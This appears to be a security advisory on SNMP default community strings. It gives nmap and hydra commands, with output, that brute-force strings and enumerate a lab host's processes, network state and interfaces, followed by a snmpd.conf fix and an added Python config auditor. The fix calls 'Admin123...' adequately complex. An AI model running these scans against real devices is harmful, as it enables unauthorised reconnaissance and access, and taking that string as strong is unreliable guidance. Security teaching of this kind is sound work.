1. Vulnerability Report
2. Vulnerability Description
SNMP stands for "Simple Network Management Protocol". It is an application-layer protocol of the TCP/IP suite that listens on UDP port 161 and is used to monitor a target device's operating system, hardware, services and applications, hardware and software configuration, network protocol state, performance and resource utilisation, device error events, application status and similar software and hardware information. SNMP exists in three versions: SNMPv1 (community-string authentication), SNMPv2c (the same as v1, with more error codes) and SNMPv3 (authentication based on the User-based Security Model). Because the protocol is easy to implement and rests on the ubiquitous TCP/IP stack, it is supported by many device vendors and deployed on firewalls, routers, switches, bridges and similar equipment. However, v1 and v2c ship with a default community string weakness: the "public" and "private" community strings. An attacker can use the "public" default to read network device information remotely and the "private" default to obtain management control of the device, and from there attack or disrupt the network.
3. Impact
In remote network management, SNMP commonly uses "public" and "private" as the default community strings, corresponding to read and write access respectively. These defaults are a security weakness: an attacker can use them to obtain more information about the remote host or to disrupt the internal network.
4. Nmap Detection and Exploitation
## Detection
```
λ nmap -sU -sV -Pn -p 161 --script="snmp-brute" 192.168.43.58
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 99e37402dc755153
| snmpEngineBoots: 33
|_ snmpEngineTime: 2h37m13s
```
## Exploitation
## Try to enumerate the running processes via SNMP
```
nmap -sU -sV -Pn -p 161 --script="snmp-processes" 192.168.43.58
```
## Try to extract system information from the SNMPv1 service
```
nmap -sU -sV -Pn -p 161 --script="snmp-sysdescr" 192.168.43.58
```
## Try to query SNMP for netstat-like output
```
nmap -sU -sV -Pn -p 161 --script="snmp-netstat" 192.168.43.58
```
## Try to enumerate the network interfaces via SNMP
```
λ nmap -sU -sV -Pn -p 161 --script="snmp-interfaces" 192.168.43.58
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 99e37402dc755153
| snmpEngineBoots: 33
|_ snmpEngineTime: 3h09m12s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 14.70 Kb sent, 14.70 Kb received
| eth0
| IP address: 192.168.43.58 Netmask: 255.255.255.0
| MAC address: 00:0c:29:3e:ba:70
| Type: ethernetCsmacd Speed: 10 Mbps
| Status: up
|_ Traffic stats: 4.48 Mb sent, 4.13 Mb received
```
5. Remediation
Edit the configuration file /etc/snmp/snmpd.conf, replace the "public" community string with a different string of adequate complexity such as Admin123..., save the file, and restart the SNMP service.
```
C:\root\桌面> cat /etc/snmp/snmpd.conf | grep Admin123... -A 2 -B 2
# sec.name source community
#com2sec paranoid default public
com2sec readonly default Admin123...
com2sec readwrite default Admin123....
####
C:\root\桌面> /etc/init.d/snmpd restart
Restarting network management services: snmpd.
```
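To check an snmpd.conf for the default community strings discussed above, here is an added example that is not part of the original post: it parses the net-snmp `com2sec`, `rocommunity` and `rwcommunity` directives, skips commented-out lines like the `#com2sec paranoid default public` entry, and flags default or short community strings. The two sample configurations, the directive syntax and the 8-character minimum are assumptions made for the example.

```python
# Added example (not from the original post): audit a net-snmp snmpd.conf for
# default or weak SNMPv1/v2c community strings. Assumed directive syntax:
#   com2sec NAME SOURCE COMMUNITY   and   rocommunity|rwcommunity COMMUNITY [SOURCE]
DEFAULT_COMMUNITIES = {"public", "private"}
MIN_LENGTH = 8  # assumed local policy minimum, not a net-snmp setting

def parse_communities(conf_text):
    """Return (directive, community, source) for each active community line.
    Text after '#' is a comment, so '#com2sec paranoid default public' is
    skipped; a missing SOURCE means net-snmp's 'default' (any address)."""
    entries = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "com2sec" and len(parts) >= 4:
            entries.append((directive, parts[3], parts[2]))
        elif directive in ("rocommunity", "rwcommunity") and len(parts) >= 2:
            source = parts[2] if len(parts) >= 3 else "default"
            entries.append((directive, parts[1], source))
    return entries

def audit(conf_text):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    for directive, community, source in parse_communities(conf_text):
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append(f"{directive}: default community '{community}' "
                            f"reachable from {source}")
        elif len(community) < MIN_LENGTH:
            findings.append(f"{directive}: short community '{community}' "
                            f"({len(community)} chars)")
    return findings

# Constructed samples mirroring the post's snmpd.conf before and after the fix.
WEAK_CONF = """\
# sec.name source community
#com2sec paranoid default public
com2sec readonly default public
com2sec readwrite default private
"""
FIXED_CONF = """\
# sec.name source community
#com2sec paranoid default public
com2sec readonly default Admin123...
com2sec readwrite default Admin123....
"""
```

Running `audit(WEAK_CONF)` reports both default strings while `audit(FIXED_CONF)` returns nothing; the `source` field in each finding shows that a `default` source accepts the string from any address, which is worth restricting alongside the string change.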
Verification with the hydra brute-force tool on Kali
## A login attempt with the original string fails
```
C:\root\桌面> hydra -p public -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:18
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:26
```
## A login attempt with the modified string succeeds
```
C:\root\桌面> hydra -p Admin123... -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:07
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
[161][snmp] host: 192.168.43.58 password: Admin123...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:07
```